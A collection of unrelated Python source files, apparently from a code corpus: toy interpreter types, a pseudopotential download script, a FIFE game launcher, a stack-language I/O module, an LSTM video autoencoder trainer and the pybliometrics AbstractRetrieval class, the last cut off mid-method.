isinstance(key, int): return self.values[key] else: slice = [] for item in (key.start, key.stop, key.step): if isinstance(item, NumberType): slice.append(int(item.value)) else: slice.append(None) start, stop, step = slice return self.values[start:stop:step] def __iter__(self, /): return iter(self.values) def __contains__(self, item, /): return item in self.values # ----- Calculation Methods ----- # def __add__(self, other, /): if isinstance(other, ListType): return ListType(self.values + other.values) else: return NotImplemented def __mul__(self, other, /): if isinstance(other, ListType): return ListType(self.values * other.values) else: return NotImplemented def __rmul__(self, other, /): if isinstance(other, ListType): return ListType(self.values * other.values) else: return NotImplemented # ----- Inner Operations ----- # @classmethod def construct(cls, obj=None, /, *, env): return cls([] if obj is None else [*obj.eval(env=env)]) class NameType(Type): # ----- Initialization Methods ----- # def __init__(self, id, /): self.id = id class SliceType(Type): # ----- Initialization Methods ----- # def __init__(self, start, stop, step, /): self.start = start self.stop = stop self.step = step # ----- Informal Methods ----- # def __repr__(self, /): return f'SliceType({self.start}, {self.stop}, {self.step})' class ArgType(Type): # ----- Initialization Methods ----- # def __init__(self, arg, /): self.arg = arg class ArgumentsType(Type): # ----- Initialization Methods ----- # def __init__(self, /, *, posonlyargs=None, args=None, vararg=None, kwonlyargs=None, kw_defaults=None, kwarg=None, defaults=None): self.posonlyargs = [] if posonlyargs is None else posonlyargs self.args = [] if args is None else args self.vararg = vararg self.kwonlyargs = [] if kwonlyargs is None else kwonlyargs self.kw_defaults = [] if kw_defaults is None else kw_defaults self.kwarg = kwarg self.defaults = [] if defaults is None else defaults class FunctionType(Type): # ----- Initialization Methods ----- # def __init__(self, /, name=None, args=None, body=None, *, qualname=None): self.name = '<anonymous>' if name is None else name self.args = ArgumentsType() if args is None else args self.body = [] if body is None else body self.qualname = self.name if qualname is None else qualname # ----- Informal Methods ----- # def __repr__(self, /): return f'<function {self.qualname} at {id(self):#x}>' # ----- Functional Methods ----- # def __call__(self, arguments, /): pass class BuiltinFunctionType(Type): # ----- Initialization Methods ----- # def __init__(self, /): self.name = '<anonymous>' self.args = ArgumentsType() # ----- Informal Methods ----- # def __repr__(self, /): return f'<built-in function {self.name}>' # ----- Functional Methods ----- # def __call__(self, /): pass class PrintFunction(BuiltinFunctionType): # ----- Initialization Methods ----- # def __init__(self, /): self.name = 'print' self.args = ArgumentsType() # ----- Functional Methods ----- # def __call__(self, /): pass false = BooleanType(False) true = BooleanType(True) none = NoneType() RESERVED = { 'false': false, 'true': true, 'none': none, } DEFAULT_ENV = { # 'print': BuiltinFunctionType('print'), } CONSTRUCTOR_TYPES = { 'Boolean': BooleanType, 'Number': NumberType, 'String': StringType, 'Tuple': TupleType, 'List': ListType, }
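

# Illustrative sketch (an addition for demonstration): the wrapper types
# mirror their Python counterparts for arithmetic and comparison.
if __name__ == '__main__':
    print(NumberType(2) + NumberType(3))       # -> 5
    print(NumberType(2) < NumberType(3))       # -> true
    print(StringType('ab') + StringType('c'))  # -> 'abc'
    print(true, false, none)                   # -> true false none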
nilq/baby-python
python
from __future__ import division

import os
import subprocess

import ase

print(ase.data.chemical_symbols)

for pseudo, pseudo_min in zip(["LDA", "GGA"], ["lda", "gga"]):
    for sym in ase.data.chemical_symbols:
        cmd = "wget https://departments.icmab.es/leem/siesta/Databases/Pseudopotentials/Pseudos_" + pseudo + "_Abinit/" + sym + "_html/" + sym + ".psf"
        print(cmd)
        subprocess.call(cmd, shell=True)
        # subprocess.call does not raise on a failed download, so check for
        # the file explicitly before renaming it.
        if os.path.exists(sym + ".psf"):
            cmd = "mv " + sym + ".psf " + sym + "." + pseudo_min + ".psf"
            print(cmd)
            subprocess.call(cmd, shell=True)
        else:
            print("no file " + sym + ".psf")
nilq/baby-python
python
import Item
import Shop

item = Item.Item("first module item", 10)
shop = Shop.Shop()

if __name__ == "__main__":
    print(item)
    print(shop)
nilq/baby-python
python
import os, sys

# import FIFE main module
from fife import fife
# import the ApplicationBase
from fife.extensions.basicapplication import ApplicationBase
# import FIFE pychan module
from fife.extensions import pychan
# import scripts
from scripts import gameplay
from scripts.common import eventListenerBase


class GameListener(eventListenerBase.EventListenerBase):
    def __init__(self, engine, gameplay):
        super(GameListener, self).__init__(engine, regKeys=True, regCmd=True, regMouse=False, regConsole=True, regWidget=True)
        self._engine = engine
        self._gameplay = gameplay
        self._quit = False

    def keyPressed(self, event):
        keyval = event.getKey().getValue()
        if keyval == fife.Key.ESCAPE:
            self._gameplay.showMainMenu()
            event.consume()

    def onCommand(self, command):
        self._quit = (command.getCommandType() == fife.CMD_QUIT_GAME)
        if self._quit:
            command.consume()


class Game(ApplicationBase):
    """
    The main application. Inherits fife.extensions.ApplicationBase.
    """
    def __init__(self, settings):
        super(Game, self).__init__(settings)
        self._gameplay = gameplay.Gameplay(self, self.engine, self._setting)
        self._listener = GameListener(self.engine, self._gameplay)

    def requestQuit(self):
        cmd = fife.Command()
        cmd.setSource(None)
        cmd.setCommandType(fife.CMD_QUIT_GAME)
        self.engine.getEventManager().dispatchCommand(cmd)

    def createListener(self):
        pass  # the listener is already created in the constructor

    def _pump(self):
        if self._listener._quit:
            self.breakRequested = True
        else:
            self._gameplay.pump()
nilq/baby-python
python
import re

from modules import RGSubModule
from functions import RGFunctionFactory
import base
import state

module = RGSubModule('t')
base.base(module)
#__all__ = ["module"]
apply = base.apply


@module
@RGFunctionFactory('a')
def ta(stack):
    stack.append(input())


@module
@RGFunctionFactory('b')
def tb(stack):
    stack.append(int(input()))


@module
@RGFunctionFactory('c')
def tc(stack):
    stack.append(float(input()))


@module
@RGFunctionFactory('d')
def td(stack):
    item = input()
    # Keep real builtins out of the eval environment.
    item_ = eval(item, {"__builtins__": None}, {})
    if not isinstance(item_, list):
        raise TypeError
    stack.append(item_)


@module
@RGFunctionFactory('e')
def te(stack):
    # NOTE: Routine is assumed to be provided by the host interpreter; it is
    # not defined or imported in this module.
    stack.append(Routine(input()))


@module
@RGFunctionFactory('f')
def tf(stack):
    item = input()
    stack.append(eval(item, {"__builtins__": None}, {}))


@module
@RGFunctionFactory('A')
def tA(stack):
    "print(stack.pop())"
    print(stack.pop())


@module
@RGFunctionFactory('B')
def tB(stack):
    "print(stack[-1])"
    print(stack[-1])


@module
@RGFunctionFactory('C')
def tC(stack):
    "print(stack)"
    print(stack)


@module
@RGFunctionFactory('D')
def tD(stack):
    "print(stack) separated by spaces"
    for i in range(len(stack)):
        print(stack[i], end=' ' * (i != len(stack) - 1))
    print()


@module
@RGFunctionFactory('E')
def tE(stack):
    "print(stack) as concatenated strings"
    for i in range(len(stack)):
        print(stack[i], end='')
    print()


@module
@RGFunctionFactory('F')
def tF(stack):
    "print(stack), emptying stack"
    print(stack)
    stack[:] = []


@module
@RGFunctionFactory('G')
def tG(stack):
    "print(stack) separated by spaces, emptying stack"
    print(*stack, sep=' ')
    stack[:] = []


@module
@RGFunctionFactory('H')
def tH(stack):
    "print(stack) as concatenated strings, emptying stack"
    for i in range(len(stack)):
        print(stack[i], end='')
    print()
    stack[:] = []


@module
@RGFunctionFactory('p')
def tp(stack):
    "unconditional immediate quit (no printing)"
    state.running = False


@module
@RGFunctionFactory('P')
def tP(stack):
    "conditional immediate quit (no printing) based on top of stack"
    b = False
    if len(stack) > 0:
        b = stack.pop()
    state.running = bool(b) and state.running


@module
@RGFunctionFactory('q')
def tq(stack):
    "unconditional quit, printing space separated"
    tG(stack)  # print space separated
    state.running = False


@module
@RGFunctionFactory('Q')
def tQ(stack):
    "unconditional quit, printing based on arg"
    if len(stack) < 1:
        pass
    elif float(stack[-1]) <= 1.0:
        tG(stack)  # print space separated
    elif float(stack[-1]) <= 2.0:
        tH(stack)  # print concatenated
    elif float(stack[-1]) <= 3.0:
        tF(stack)  # print as list
    state.running = False


@module
@RGFunctionFactory('r')
def tr(stack):
    "conditional quit, printing space separated"
    if len(stack) < 1 or bool(stack[-1]):
        tG(stack)  # print space separated
        state.running = False
    else:
        tD(stack)  # print space separated, leaving stack


@module
@RGFunctionFactory('R', 1)
def tR(stack):
    "conditional quit, printing based on arg: (bool arg tR) will quit if bool and print if arg (even if it doesnt quit)"
    arg = stack.pop()
    b = False
    if len(stack) > 0:
        b = stack.pop()
    # Printing depends only on arg and happens even if the program does not quit.
    if float(arg) <= 1.0:
        tD(stack)  # print space separated
    elif float(arg) <= 2.0:
        tE(stack)  # print concatenated
    elif float(arg) <= 3.0:
        tC(stack)  # print as list
    # Quit when the popped flag is truthy ("will quit if bool").
    state.running = state.running and not bool(b)
    if not state.running:
        stack[:] = []


@module
@RGFunctionFactory('t')
def tt(stack):
    "reverse stack"
    stack[:] = stack[::-1]


@module
@RGFunctionFactory('y')
def ty(stack):
    state.debug_ = True


@module
@RGFunctionFactory('Y')
def tY(stack):
    state.debug_ = False


@module
@RGFunctionFactory('z')
def tz(_):
    "zoom in to top of stack"
    state.stack.zoomin()


@module
@RGFunctionFactory('Z') def tZ(_): "zoom out from stack to parent stack" state.stack.zoomout()
nilq/baby-python
python
# Basic libraries import numpy as np import tensorflow as tf import os from data_gen import get_next_batch from util import is_existing tf.reset_default_graph() tf.set_random_seed(2016) np.random.seed(2016) # LSTM-autoencoder from LSTMAutoencoder import * # Constants batch_num = 1 hidden_num = 128 step_num = 200 # number of frames in video elem_num = 37604 # number of pixel in one frame epochs = 3000 dataset_name = 'UCSDped1' TRAIN_DIR = 'data/' + dataset_name + '/Train' n_train_video = len(os.listdir(TRAIN_DIR)) iter_per_epoch = int(n_train_video / batch_num) iteration = 10000 training_indexes = os.listdir(TRAIN_DIR) # placeholder list p_input = tf.placeholder(tf.float32, shape=(batch_num, step_num, elem_num)) p_inputs = [tf.squeeze(t, [1]) for t in tf.split(p_input, step_num, 1)] cell = tf.nn.rnn_cell.LSTMCell(hidden_num, use_peepholes=True) ae = LSTMAutoencoder(hidden_num, p_inputs, cell=cell, decode_without_input=True) with tf.Session() as sess: sess.run(tf.global_variables_initializer()) sequences = None saver = tf.train.Saver() model_name = "videoae_" + dataset_name + '_' + str(hidden_num) + ".ckpt" if is_existing(model_name): saver.restore(sess, "models/" + str(hidden_num) + "/" + model_name) for i in range(epochs): # if batchsize > 1 should shuffle dataset for j in range(iter_per_epoch): sequences = get_next_batch(j, batch_num) (loss_val, _) = sess.run([ae.loss, ae.train], {p_input: sequences}) print('Epoch ', i,' iter %d:' % (j + 1), loss_val) (input_, output_) = sess.run([ae.input_, ae.output_], {p_input: sequences}) print('train result :') print('input :', input_[0, :, :].flatten()) print(input_[0, :, :].flatten().shape) print('output :', output_[0, :, :].flatten()) print('diff value :', np.sum(input_[0, :, :].flatten() - output_[0, :, :].flatten())) file_path = "models/" + str(hidden_num) + "/" + model_name save_path = saver.save(sess, file_path) print("Model saved in path: %s" % save_path)
nilq/baby-python
python
from collections import namedtuple from pybliometrics.scopus.superclasses import Retrieval from pybliometrics.scopus.utils import chained_get, get_id, detect_id_type,\ get_link, listify class AbstractRetrieval(Retrieval): @property def abstract(self): """The abstract of a document. Note: If this is empty, try property description instead. """ return self._head.get('abstracts') @property def affiliation(self): """A list of namedtuples representing listed affiliations in the form (id, name, city, country). Note: Might be empty. """ out = [] aff = namedtuple('Affiliation', 'id name city country') affs = listify(self._json.get('affiliation', [])) for item in affs: new = aff(id=item.get('@id'), name=item.get('affilname'), city=item.get('affiliation-city'), country=item.get('affiliation-country')) out.append(new) return out or None @property def aggregationType(self): """Aggregation type of source the document is published in.""" return chained_get(self._json, ['coredata', 'prism:aggregationType']) @property def authkeywords(self): """List of author-provided keywords of the document.""" keywords = self._json.get('authkeywords') if not keywords: return None else: try: return [d['$'] for d in keywords['author-keyword']] except TypeError: # Singleton keyword return [keywords['author-keyword']['$']] @property def authorgroup(self): """A list of namedtuples representing the article's authors organized by affiliation, in the form (affiliation_id, dptid, organization, city, postalcode, addresspart, country, auid, indexed_name, surname, given_name). If "given_name" is not present, fall back to initials. Note: Affiliation information might be missing or mal-assigned even when it lookes correct in the web view. In this case please request a correction. """ out = [] fields = 'affiliation_id dptid organization city postalcode '\ 'addresspart country auid indexed_name surname given_name' auth = namedtuple('Author', fields) items = listify(self._head.get('author-group', [])) index_path = ['preferred-name', 'ce:indexed-name'] for item in items: if not item: continue # Affiliation information aff = item.get('affiliation', {}) try: aff_ids = listify(aff['affiliation-id']) aff_id = ", ".join([a["@afid"] for a in aff_ids]) except KeyError: aff_id = aff.get("@afid") org = _get_org(aff) # Author information (might relate to collaborations) authors = listify(item.get('author', item.get('collaboration', []))) for au in authors: try: given = au.get('ce:given-name', au['ce:initials']) except KeyError: # Collaboration given = au.get('ce:text') new = auth(affiliation_id=aff_id, organization=org, city=aff.get('city'), dptid=aff.get("@dptid"), postalcode=aff.get('postal-code'), addresspart=aff.get('address-part'), country=aff.get('country'), auid=au.get('@auid'), surname=au.get('ce:surname'), given_name=given, indexed_name=chained_get(au, index_path)) out.append(new) return out or None @property def authors(self): """A list of namedtuples representing the article's authors, in the form (auid, indexed_name, surname, given_name, affiliation_id, affiliation, city, country). Note: The affiliation referred to here is what Scopus' algorithm determined as the main affiliation. Property `authorgroup` provides all affiliations. 
""" out = [] fields = 'auid indexed_name surname given_name affiliation' auth = namedtuple('Author', fields) for item in chained_get(self._json, ['authors', 'author'], []): affs = [a for a in listify(item.get('affiliation')) if a] if affs: aff = [aff.get('@id') for aff in affs] else: aff = None new = auth(auid=item['@auid'], surname=item.get('ce:surname'), indexed_name=item.get('ce:indexed-name'), affiliation=aff, given_name=chained_get(item, ['preferred-name', 'ce:given-name'])) out.append(new) return out or None @property def citedby_count(self): """Number of articles citing the document.""" cites = chained_get(self._json, ['coredata', 'citedby-count']) if cites: cites = int(cites) return cites @property def citedby_link(self): """URL to Scopus page listing citing documents.""" return get_link(self._json, 2) @property def chemicals(self): """List of namedtuples representing chemical entities in the form (source, chemical_name, cas_registry_number). In case multiple numbers given, they are joined on ";". """ path = ['enhancement', 'chemicalgroup', 'chemicals'] items = listify(chained_get(self._head, path, [])) fields = 'source chemical_name cas_registry_number' chemical = namedtuple('Chemical', fields) out = [] for item in items: for chem in listify(item['chemical']): number = chem.get('cas-registry-number') try: # Multiple numbers given num = ";".join([n['$'] for n in number]) except TypeError: num = number new = chemical(source=item['@source'], cas_registry_number=num, chemical_name=chem['chemical-name']) out.append(new) return out or None @property def confcode(self): """Code of the conference the document belong to.""" return self._confevent.get('confcode') @property def confdate(self): """Date range of the conference the document belongs to represented by two tuples in the form (YYYY, MM, DD). """ dates = self._confevent.get('confdate', {}) try: keys = ("startdate", "enddate") date_order = ("@year", "@month", "@day") d = (tuple(int(dates[k1][k2]) for k2 in date_order) for k1 in keys) return tuple(d) except KeyError: return None @property def conflocation(self): """Location of the conference the document belongs to.""" return chained_get(self._confevent, ['conflocation', 'city-group']) @property def confname(self): """Name of the conference the document belongs to.""" return self._confevent.get('confname') @property def confsponsor(self): """Sponsor(s) of the conference the document belongs to.""" path = ['confsponsors', 'confsponsor'] sponsors = chained_get(self._confevent, path, []) if len(sponsors) == 0: return None if isinstance(sponsors, list): return [s['$'] for s in sponsors] return sponsors @property def contributor_group(self): """List of namedtuples representing contributors compiled by Scopus, in the form (given_name, initials, surname, indexed_name, role). """ path = ['source', 'contributor-group'] items = listify(chained_get(self._head, path, [])) out = [] fields = 'given_name initials surname indexed_name role' pers = namedtuple('Contributor', fields) for item in items: entry = item.get('contributor', {}) new = pers(indexed_name=entry.get('ce:indexed-name'), role=entry.get('@role'), surname=entry.get('ce:surname'), given_name=entry.get('ce:given-name'), initials=entry.get('ce:initials')) out.append(new) return out or None @property def correspondence(self): """namedtuple representing the author to whom correspondence should be addressed, in the form (surname, initials, organization, country, city_group). Multiple organziations are joined on semicolon. 
""" fields = 'surname initials organization country city_group' auth = namedtuple('Correspondence', fields) corr = self._head.get('correspondence') if corr is None: return None aff = corr.get('affiliation', {}) try: org = aff['organization'] try: org = org['$'] except TypeError: # Multiple names given org = "; ".join([d['$'] for d in org]) except KeyError: org = None return auth(surname=corr.get('person', {}).get('ce:surname'), initials=corr.get('person', {}).get('ce:initials'), organization=org, country=aff.get('country'), city_group=aff.get('city-group')) @property def coverDate(self): """The date of the cover the document is in.""" return chained_get(self._json, ['coredata', 'prism:coverDate']) @property def description(self): """Return the description of a record. Note: If this is empty, try property abstract instead. """ return chained_get(self._json, ['coredata', 'dc:description']) @property def doi(self): """DOI of the document.""" return chained_get(self._json, ['coredata', 'prism:doi']) @property def eid(self): """EID of the document.""" return chained_get(self._json, ['coredata', 'eid']) @property def endingPage(self): """Ending page. If this is empty, try .pageRange instead.""" # Try coredata first, fall back to head afterwards ending = chained_get(self._json, ['coredata', 'prism:endingPage']) if not ending: path = ['source', 'volisspag', 'pagerange', '@last'] ending = chained_get(self._head, path) return ending @property def funding(self): """List of namedtuples parsed funding information in the form (agency string id acronym country). """ path = ['item', 'xocs:meta', 'xocs:funding-list', 'xocs:funding'] funds = listify(chained_get(self._json, path, [])) out = [] fund = namedtuple('Funding', 'agency string id acronym country') for item in funds: new = fund(agency=item.get('xocs:funding-agency'), string=item.get('xocs:funding-agency-matched-string'), id=item.get('xocs:funding-agency-id'), acronym=item.get('xocs:funding-agency-acronym'), country=item.get('xocs:funding-agency-country')) out.append(new) return out or None @property def funding_text(self): """The raw text from which Scopus derives funding information.""" path = ['item', 'xocs:meta', 'xocs:funding-list', 'xocs:funding-text'] return chained_get(self._json, path) @property def isbn(self): """ISBNs belonging to publicationName as tuple of variying length, (e.g. ISBN-10 or ISBN-13).""" isbns = listify(chained_get(self._head, ['source', 'isbn'], [])) if len(isbns) == 0: return None else: return tuple((i['$'] for i in isbns)) @property def issn(self): """ISSN belonging to the publicationName. Note: If E-ISSN is known to Scopus, this returns both ISSN and E-ISSN in random order separated by blank space. 
""" return chained_get(self._json, ['coredata', 'prism:issn']) @property def identifier(self): """ID of the document (same as EID without "2-s2.0-").""" return get_id(self._json) @property def idxterms(self): """List of index terms (these are just one category of those Scopus provides in the web version) .""" try: terms = listify(self._json.get("idxterms", {}).get('mainterm', [])) except AttributeError: # idxterms is empty return None try: return [d['$'] for d in terms] or None except AttributeError: return None @property def issueIdentifier(self): """Number of the issue the document was published in.""" return chained_get(self._json, ['coredata', 'prism:issueIdentifier']) @property def issuetitle(self): """Title of the issue the document was published in.""" return chained_get(self._head, ['source', 'issuetitle']) @property def language(self): """Language of the article.""" return chained_get(self._json, ['language', '@xml:lang']) @property def openaccess(self): """The openaccess status encoded in single digits.""" return chained_get(self._json, ['coredata', 'openaccess']) @property def openaccessFlag(self): """Whether the document is available via open access or not.""" flag = chained_get(self._json, ['coredata', 'openaccessFlag']) if flag: flag = flag == "true" return flag @property def pageRange(self): """Page range. If this is empty, try .startingPage and .endingPage instead. """ # Try data from coredata first, fall back to head afterwards pages = chained_get(self._json, ['coredata', 'prism:pageRange']) if not pages: return chained_get(self._head, ['source', 'volisspag', 'pages']) return pages @property def pii(self): """The PII (Publisher Item Identifier) of the document.""" return chained_get(self._json, ['coredata', 'pii']) @property def publicationName(self): """Name of source the document is published in.""" return chained_get(self._json, ['coredata', 'prism:publicationName']) @property def publisher(self): """Name of the publisher of the document. Note: Information provided in the FULL view of the article might be more complete. """ # Return information from FULL view, fall back to other views full = chained_get(self._head, ['source', 'publisher', 'publishername']) if full is None: return chained_get(self._json, ['coredata', 'dc:publisher']) else: return full @property def publisheraddress(self): """Name of the publisher of the document.""" return chained_get(self._head, ['source', 'publisher', 'publisheraddress']) @property def pubmed_id(self): """The PubMed ID of the document.""" return chained_get(self._json, ['coredata', 'pubmed-id']) @property def refcount(self): """Number of references of an article. Note: Requires either the FULL view or REF view. """ try: # REF view return self._ref['@total-references'] except KeyError: # FULL view return self._ref.get('@refcount') @property def references(self): """List of namedtuples representing references listed in the document, in the form (position, id, doi, title, authors, authors_auid, authors_affiliationid, sourcetitle, publicationyear, volume, issue, first, last, citedbycount, type, text, fulltext). 
`position` is the number at which the reference appears in the document, `id` is the Scopus ID of the referenced document (EID without the "2-s2.0-"), `authors` is a string of the names of the authors in the format "Surname1, Initials1; Surname2, Initials2", `authors_auid` is a string of the author IDs joined on "; ", `authors_affiliationid` is a string of the authors' affiliation IDs joined on "; ", `sourcetitle` is the name of the source (e.g. the journal), `publicationyear` is the year of the publication as a string, `volume` and `issue`, are strings referring to the volume and issue, `first` and `last` refer to the page range, `citedbycount` is a string for the total number of citations of the cited item, `type` describes the parsing status of the reference (resolved or not), `text` is Scopus-provided information on the publication, `fulltext` is the text the authors used for the reference. Note: Requires either the FULL view or REF view. Might be empty even if refcount is positive. Specific fields can be empty. Author lists (authors, authors_auid, authors_affiliationid) may contain duplicates but None's have been filtered out. """ out = [] fields = 'position id doi title authors authors_auid '\ 'authors_affiliationid sourcetitle publicationyear volume '\ 'issue first last citedbycount type text fulltext' ref = namedtuple('Reference', fields) items = listify(self._ref.get("reference", [])) for item in items: info = item.get('ref-info', item) volisspag = info.get('volisspag', {}) or {} if isinstance(volisspag, list): volisspag = volisspag[0] volis = volisspag.get("voliss", {}) if isinstance(volis, list): volis = volis[0] # Parse author information try: # FULL view parsing auth = listify(item['ref-info']['ref-authors']['author']) authors = [', '.join([d['ce:surname'], d['ce:initials']]) for d in auth] auids = None affids = None ids = listify(info['refd-itemidlist']['itemid']) doi = _select_by_idtype(ids, id_type='DOI') scopus_id = _select_by_idtype(ids, id_type='SGR') except KeyError: # REF view parsing auth = (info.get('author-list') or {}).get('author', []) authors = [', '.join(filter(None, [d.get('ce:surname'), d.get('ce:given-name')])) for d in auth] auids = "; ".join(filter(None, [d.get('@auid') for d in auth])) affs = filter(None, [d.get('affiliation') for d in auth]) affids = "; ".join([aff.get('@id') for aff in affs]) doi = info.get('ce:doi') scopus_id = info.get('scopus-id') # Combine information new = ref(position=item.get('@id'), id=scopus_id, doi=doi, authors="; ".join(authors), authors_auid=auids or None, authors_affiliationid=affids or None, title=info.get('ref-title', {}).get('ref-titletext', info.get('title')), sourcetitle=info.get('ref-sourcetitle', info.get('sourcetitle')), publicationyear=info.get('ref-publicationyear', {}).get('@first'), volume=volis.get('@volume'), issue=volis.get('@issue'), first=volisspag.get('pagerange', {}).get('@first'), last=volisspag.get('pagerange', {}).get('@last'), citedbycount=info.get('citedby-count'), type=info.get('type'), text=info.get('ref-text'), fulltext=item.get('ref-fulltext')) out.append(new) return out or None @property def scopus_link(self): """URL to the document page on Scopus.""" return get_link(self._json, 1) @property def self_link(self): """URL to Scopus API page of this document.""" return get_link(self._json, 0) @property def sequencebank(self): """List of namedtuples representing biological entities defined or mentioned in the text, in the form (name, sequence_number, type). 
""" path = ['enhancement', 'sequencebanks', 'sequencebank'] items = listify(chained_get(self._head, path, [])) bank = namedtuple('Sequencebank', 'name sequence_number type') out = [] for item in items: numbers = listify(item['sequence-number']) for number in numbers: new = bank(name=item['@name'], sequence_number=number['$'], type=number['@type']) out.append(new) return out or None @property def source_id(self): """Scopus source ID of the document.""" return chained_get(self._json, ['coredata', 'source-id']) @property def sourcetitle_abbreviation(self): """Abbreviation of the source the document is published in. Note: Requires the FULL view of the article. """ return self._head.get('source', {}).get('sourcetitle-abbrev') @property def srctype(self): """Aggregation type of source the document is published in (short version of aggregationType). """ return chained_get(self._json, ['coredata', 'srctype']) @property def startingPage(self): """Starting page. If this is empty, try .pageRange instead.""" # Try coredata first, fall back to bibrecord afterwards starting = chained_get(self._json, ['coredata', 'prism:startingPage']) if not starting: path = ['source', 'volisspag', 'pagerange', '@first'] starting = chained_get(self._head, path) return starting @property def subject_areas(self): """List of namedtuples containing subject areas of the article in the form (area abbreviation code). Note: Requires the FULL view of the article. """ area = namedtuple('Area', 'area abbreviation code') path = ['subject-areas', 'subject-area'] out = [area(area=item['$'], abbreviation=item['@abbrev'], code=item['@code']) for item in listify(chained_get(self._json, path, []))] return out or None @property def subtype(self): """Type of the document. Refer to the Scopus Content Coverage Guide for a list of possible values. Short version of subtypedescription. """ return chained_get(self._json, ['coredata', 'subtype']) or None @property def subtypedescription(self): """Type of the document. Refer to the Scopus Content Coverage Guide for a list of possible values. Long version of subtype. """ return chained_get(self._json, ['coredata', 'subtypeDescription']) or None @property def title(self): """Title of the document.""" return chained_get(self._json, ['coredata', 'dc:title']) @property def url(self): """URL to the API view of the document.""" return chained_get(self._json, ['coredata', 'prism:url']) @property def volume(self): """Volume for the document.""" return chained_get(self._json, ['coredata', 'prism:volume']) @property def website(self): """Website of publisher.""" path = ['source', 'website', 'ce:e-address', '$'] return chained_get(self._head, path) def __init__(self, identifier=None, refresh=False, view='META_ABS', id_type=None): """Interaction with the Abstract Retrieval API. Parameters ---------- identifier : str or int The identifier of a document. Can be the Scopus EID, the Scopus ID, the PII, the Pubmed-ID or the DOI. refresh : bool or int (optional, default=False) Whether to refresh the cached file if it exists or not. If int is passed, cached file will be refreshed if the number of days since last modification exceeds that value. id_type: str (optional, default=None) The type of used ID. Allowed values: None, 'eid', 'pii', 'scopus_id', 'pubmed_id', 'doi'. If the value is None, the function tries to infer the ID type itself. view : str (optional, default=META_ABS) The view of the file that should be downloaded. 
Allowed values: META, META_ABS, REF, FULL, where FULL includes all information of META_ABS view and META_ABS includes all information of the META view. For details see https://dev.elsevier.com/guides/AbstractRetrievalViews.htm. Raises ------ ValueError If the id_type parameter or the view parameter contains invalid entries. Examples -------- See https://pybliometrics.readthedocs.io/en/stable/examples/AbstractRetrieval.html. Notes ----- The directory for cached results is `{path}/{view}/{identifier}`, where `path` is specified in `~/.scopus/config.ini`. In case `identifier` is a DOI,, an underscore replaces the forward slash. """ # Checks identifier = str(identifier) allowed_views = ('META', 'META_ABS', 'REF', 'FULL') if view not in allowed_views: raise ValueError('view parameter must be one of ' + ', '.join(allowed_views)) if id_type is None: id_type = detect_id_type(identifier) else: allowed_id_types = ('eid', 'pii', 'scopus_id', 'pubmed_id', 'doi') if id_type not in allowed_id_types: raise ValueError('id_type parameter must be one of ' + ', '.join(allowed_id_types)) # Load json Retrieval.__init__(self, identifier=identifier, id_type=id_type, api='AbstractRetrieval', refresh=refresh, view=view) self._json = self._json['abstracts-retrieval-response'] self._head = chained_get(self._json, ["item", "bibrecord", "head"], {}) conf_path = ['source', 'additional-srcinfo', 'conferenceinfo', 'confevent'] self._confevent = chained_get(self._head, conf_path, {}) if self._view == "REF": ref_path = ["references"] else: ref_path = ['item', 'bibrecord', 'tail', 'bibliography'] self._ref = chained_get(self._json, ref_path, {}) def __str__(self): """Return pretty text version of the document. Assumes the document is a journal article and was loaded with view="META_ABS" or view="FULL". """ date = self.get_cache_file_mdate().split()[0] # Authors if self.authors: if len(self.authors) > 1: authors = _list_authors(self.authors) else: a = self.authors[0] authors = str(a.given_name) + ' ' + str(a.surname) else: authors = "(No author found)" # All other information s = f'{authors}: "{self.title}", {self.publicationName}, {self.volume}' if self.issueIdentifier: s += f'({self.issueIdentifier})' s += ', ' s += _parse_pages(self) s += f'({self.coverDate[:4]}).' if self.doi: s += f' https://doi.org/{self.doi}.\n' s += f'{self.citedby_count} citation(s) as of {date}' if self.affiliation: s += "\n Affiliation(s):\n " s += '\n '.join([aff.name for aff in self.affiliation]) return s def get_bibtex(self): """Bibliographic entry in BibTeX format. Raises ------ ValueError If the item's aggregationType is not Journal. 
""" if self.aggregationType != 'Journal': raise ValueError('Only Journal articles supported.') # Item key year = self.coverDate[0:4] first = self.title.split()[0].title() last = self.title.split()[-1].title() key = ''.join([self.authors[0].surname, year, first, last]) # Authors authors = ' and '.join([f"{a.given_name} {a.surname}" for a in self.authors]) # Pages if self.pageRange: pages = self.pageRange elif self.startingPage: pages = f'{self.startingPage}-{self.endingPage}' else: pages = '-' # All information bib = "@article{{{key},\n author = {{{auth}}},\n title = "\ "{{{{{title}}}}},\n journal = {{{jour}}},\n year = "\ "{{{year}}},\n volume = {{{vol}}},\n number = {{{number}}},"\ "\n pages = {{{pages}}}".format( key=key, auth=authors, title=self.title, year=year, jour=self.publicationName, vol=self.volume, number=self.issueIdentifier, pages=pages) # DOI if self.doi: bib += ",\n doi = {{{}}}".format(self.doi) bib += "}" return bib def get_html(self): """Bibliographic entry in html format.""" # Author links au_link = ('<a href="https://www.scopus.com/authid/detail.url' '?origin=AuthorProfile&authorId={0}">{1}</a>') if len(self.authors) > 1: authors = u', '.join([au_link.format(a.auid, a.given_name + ' ' + a.surname) for a in self.authors[0:-1]]) authors += (u' and ' + au_link.format(self.authors[-1].auid, (str(self.authors[-1].given_name) + ' ' + str(self.authors[-1].surname)))) else: a = self.authors[0] authors = au_link.format(a.auid, a.given_name + ' ' + a.surname) title = u'<a href="{}">{}</a>'.format(self.scopus_link, self.title) if self.volume and self.issueIdentifier: volissue = u'<b>{}({})</b>'.format(self.volume, self.issueIdentifier) elif self.volume: volissue = u'<b>{}</b>'.format(self.volume) else: volissue = 'no volume' jlink = '<a href="https://www.scopus.com/source/sourceInfo.url'\ f'?sourceId={self.source_id}">{self.publicationName}</a>' s = f"{authors}, {title}, {jlink}, {volissue}, " +\ f"{_parse_pages(self, unicode=True)}, ({self.coverDate[:4]})." if self.doi: s += f' <a href="https://doi.org/{self.doi}">doi:{self.doi}</a>.' return s def get_latex(self): """Bibliographic entry in LaTeX format.""" if len(self.authors) > 1: authors = _list_authors(self.authors) else: a = self.authors authors = ' '.join([a.given_name, a.surname]) if self.volume and self.issueIdentifier: volissue = f'\\textbf{{{self.volume}({self.issueIdentifier})}}' elif self.volume: volissue = f'\\textbf{{{self.volume}}}' else: volissue = 'no volume' s = f'{authors}, \\textit{{{self.title}}}, {self.publicationName}, ' +\ f'{volissue}, {_parse_pages(self)} ({self.coverDate[:4]}).' if self.doi: s += f' \\href{{https://doi.org/{self.doi}}}{{doi:{self.doi}}}, ' s += f'\\href{{{self.scopus_link}}}{{scopus:{self.eid}}}.' return s def get_ris(self): """Bibliographic entry in RIS (Research Information System Format) format for journal articles. 